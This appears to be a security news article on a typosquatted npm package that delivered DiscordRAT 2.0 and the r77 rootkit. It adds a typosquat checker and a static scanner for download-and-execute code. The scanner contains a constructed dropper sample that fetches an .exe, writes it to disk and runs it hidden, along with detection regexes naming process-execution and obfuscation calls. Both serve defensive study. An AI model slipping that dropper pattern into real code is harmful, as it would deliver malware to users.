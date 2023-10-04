A new deceptive package in the npm package registry was discovered distributing an open-source rootkit called r77, marking the first time a malicious npm package has been found delivering rootkit functionality.

What do we know about r77

The package in question is node-hide-console-windows, which mimics the legitimate npm package node-hide-console-window in a classic case of typosquatting (the only difference is the trailing "s"). The malicious package was downloaded 704 times in the two months before it was removed.
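Because the whole trick here is a one-character name difference, the check a developer can actually automate is a lookalike test on dependency names before installing. The following Node.js script is an added example, not code from the article or from ReversingLabs: it computes an edit distance (Damerau-Levenshtein, so a swapped pair of letters also costs 1) between each dependency name in a package.json and a small trusted allowlist, and flags names that are close to, but not identical with, a trusted name. The allowlist and the sample package.json are constructed for the demo; in practice you would feed it your organisation's approved dependency list.

```javascript
// Added example (not from the article, ReversingLabs or the npm package):
// flag dependency names that sit within a small edit distance of a trusted
// package name, the lookalike shape node-hide-console-windows relied on.

// Optimal-string-alignment variant of Damerau-Levenshtein distance:
// insertions, deletions, substitutions and adjacent transpositions cost 1.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // transposition
      }
    }
  }
  return d[a.length][b.length];
}

// Constructed allowlist for the demo. A real one would be your approved
// dependency list or the set of packages you actually depend on.
const TRUSTED = ['node-hide-console-window', 'express', 'lodash', 'chalk'];

// Return { trusted, distance } for the closest trusted name within
// maxDistance, or null if the name is an exact trusted name or not close
// to anything. Exact matches are never lookalikes.
function findLookalike(name, trusted = TRUSTED, maxDistance = 2) {
  if (trusted.includes(name)) return null;
  let best = null;
  for (const t of trusted) {
    const distance = editDistance(name, t);
    if (distance <= maxDistance && (best === null || distance < best.distance)) {
      best = { trusted: t, distance };
    }
  }
  return best;
}

// Audit every dependency and devDependency name in a package.json object.
function auditDependencies(pkg, trusted = TRUSTED) {
  const names = Object.keys({ ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) });
  const findings = [];
  for (const name of names) {
    const hit = findLookalike(name, trusted);
    if (hit) findings.push({ name, lookalikeOf: hit.trusted, distance: hit.distance });
  }
  return findings;
}

// Constructed sample package.json: one typosquat of the package from the
// article, one legitimate dependency, and one transposed-letter lookalike.
const samplePkg = {
  dependencies: { 'node-hide-console-windows': '*', express: '*' },
  devDependencies: { lodahs: '*' },
};

for (const f of auditDependencies(samplePkg)) {
  console.log(`WARNING: "${f.name}" is ${f.distance} edit(s) from trusted "${f.lookalikeOf}"`);
}
```

Run it with `node` and it prints two warnings: node-hide-console-windows (one edit from node-hide-console-window) and lodahs (one transposition from lodash), while express passes. The distance threshold is deliberately small; raising it catches more variants but also flags legitimately similar names, so treat the output as a prompt to look at the package page, not as a verdict.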

ReversingLabs, which first observed the activity in August 2023, said the package "downloaded a Discord bot that facilitated the installation of an open-source rootkit, r77," adding that "it seems that open-source projects can increasingly be considered a means of distributing malware".

According to ReversingLabs, the malicious code lives in the package's index.js file: once that file is executed, it downloads an executable and launches it automatically.
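The behaviour described above (a module that fetches an executable, writes it to disk and starts it) is a shape you can look for statically before you ever run a package. The script below is an added example and is not the malicious package's code nor anything published by ReversingLabs; it scans JavaScript source for indicators in four classes (download, binary write, execution, obfuscation) and reports the combination, since a network call on its own is common in legitimate modules while network plus process execution in a package that needs neither is the dropper shape. The indicator lists and both sample sources are constructed for the demo and are assumptions, not a complete signature set.

```javascript
// Added example (not the malicious package's code and not from the article
// or ReversingLabs): static triage of JavaScript source for the
// download-then-execute pattern. Indicator lists are demo assumptions.

const INDICATORS = {
  download: [/\bhttps?\.get\s*\(/, /\bfetch\s*\(/, /\baxios\b/, /\brequest\s*\(/],
  writeBinary: [/\bfs\.(writeFile|writeFileSync|createWriteStream)\s*\(/, /\.exe\b/i],
  execute: [/\bchild_process\b/, /\b(exec|execSync|execFile|execFileSync|spawn|spawnSync)\s*\(/],
  obfuscation: [/Buffer\.from\([^)]*['"]base64['"]\)/, /\beval\s*\(/, /String\.fromCharCode/],
};

// Scan one source string. Returns a map of indicator class -> list of
// { pattern, line } for the first line each regex matched on.
function scanSource(src) {
  const lines = src.split('\n');
  const hits = {};
  for (const [cls, regexes] of Object.entries(INDICATORS)) {
    for (const re of regexes) {
      const idx = lines.findIndex((l) => re.test(l));
      if (idx !== -1) {
        if (!hits[cls]) hits[cls] = [];
        hits[cls].push({ pattern: re.source, line: idx + 1 });
      }
    }
  }
  return hits;
}

// Verdict from the combination of classes, not from any single hit:
//   download + execute  -> 'download-and-execute' (dropper shape)
//   execute or obfuscation alone -> 'review'
//   nothing -> 'clean'
function triage(src) {
  const hits = scanSource(src);
  const has = (c) => Boolean(hits[c]);
  let verdict = 'clean';
  if (has('download') && has('execute')) verdict = 'download-and-execute';
  else if (has('execute') || has('obfuscation')) verdict = 'review';
  return { verdict, hits };
}

// Constructed dropper-shaped sample. This is NOT the real package's code;
// the URL uses the reserved .invalid TLD so it can never resolve.
const DROPPER_SAMPLE = `
const https = require('https');
const fs = require('fs');
const { execFile } = require('child_process');
const out = require('os').tmpdir() + '/update.exe';
https.get('https://example.invalid/update.exe', (res) => {
  const f = fs.createWriteStream(out);
  res.pipe(f).on('finish', () => execFile(out, [], { windowsHide: true }));
});
`;

// Constructed benign sample: exports one function and touches nothing external.
const BENIGN_SAMPLE = `
function hideConsole() { return process.platform === 'win32'; }
module.exports = { hideConsole };
`;

for (const [name, src] of [['dropper', DROPPER_SAMPLE], ['benign', BENIGN_SAMPLE]]) {
  const { verdict, hits } = triage(src);
  console.log(`${name}: ${verdict}`, Object.keys(hits));
}
```

Run with `node` it reports the constructed dropper as download-and-execute (download, writeBinary and execute classes all fire) and the benign module as clean. Pointing `triage` at the `index.js` of each package in `node_modules` before the first `require` of a new dependency is the cheap version of this check; it will not catch a payload that is itself obfuscated beyond the few patterns listed, which is why the obfuscation class alone already yields a "review" verdict rather than "clean".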

The executable in question is an open-source C#-based Trojan known as DiscordRAT 2.0, which lets an operator remotely control a victim system through Discord using more than 40 commands, including ones that collect sensitive data and disable security software.

One of those commands is "!rootkit", which launches the r77 rootkit on the compromised system. r77, actively maintained by bytecode77, is a "fileless ring 3 rootkit" designed to hide files and processes; it can be embedded in other software or started directly.

This is far from the first time r77 has appeared in real-world malicious campaigns: attackers have used it in a series of attacks distributing the SeroXen Trojan and cryptocurrency miners.

Additionally, two other versions of node-hide-console-windows were found fetching an open-source information stealer called Blank-Grabber alongside DiscordRAT 2.0, disguised as a "visual code update".

A noteworthy aspect of the campaign is that it is built entirely from components freely available online, so it took little effort on the part of the bad actors to put it all together. That lowers the barrier to entry for supply chain attacks, even for less capable criminals.

The findings highlight the need for caution among developers when installing packages from open-source repositories. Last week, Fortinet FortiGuard Labs identified nearly three dozen modules, varying in coding style and execution method, that were equipped with data collection capabilities.

"The author or authors [of the malicious package] have made an effort to make their packages seem reliable," said security researcher Lucija Valentić, who added, "The author(s) behind this campaign created an npm page that closely resembled the page of the legitimate package being typosquatted, and even created 10 versions of the malicious package to mimic the package they were copying."

What to do if you come across a rootkit like r77

Fortunately, several tools can deal with this kind of problem, but one that is unlikely to let you down is good old Malwarebytes.

Malwarebytes includes a rootkit scan option, which you have to enable yourself: it is found in the advanced scan settings.

In addition to enabling that option, you should also turn on scanning inside compressed archives, in case something is hidden inside zip or rar files. With both options on, a full scan can take a long time (4 to 8 hours, depending on how much data you have saved and how fast your PC is), but once the program has quarantined the threats, all you have to do is delete them.

One caveat that follows from what r77 is: a ring 3 rootkit hides files and processes by interfering with the user-mode view of the system, so a scan launched from inside the infected session may simply not see what it hides. If a scan comes back clean but the machine still behaves suspiciously, scan it from clean boot media instead. And because this campaign also dropped DiscordRAT 2.0, which collects sensitive data, treat any credentials, API keys and npm tokens that were on that machine as compromised and rotate them, and remove the package from your package.json and lockfile so it is not reinstalled.

Remember, though, that most of it is up to you: don't download things from dubious sources, check that a dependency's name is exactly the one you meant, and in general be careful.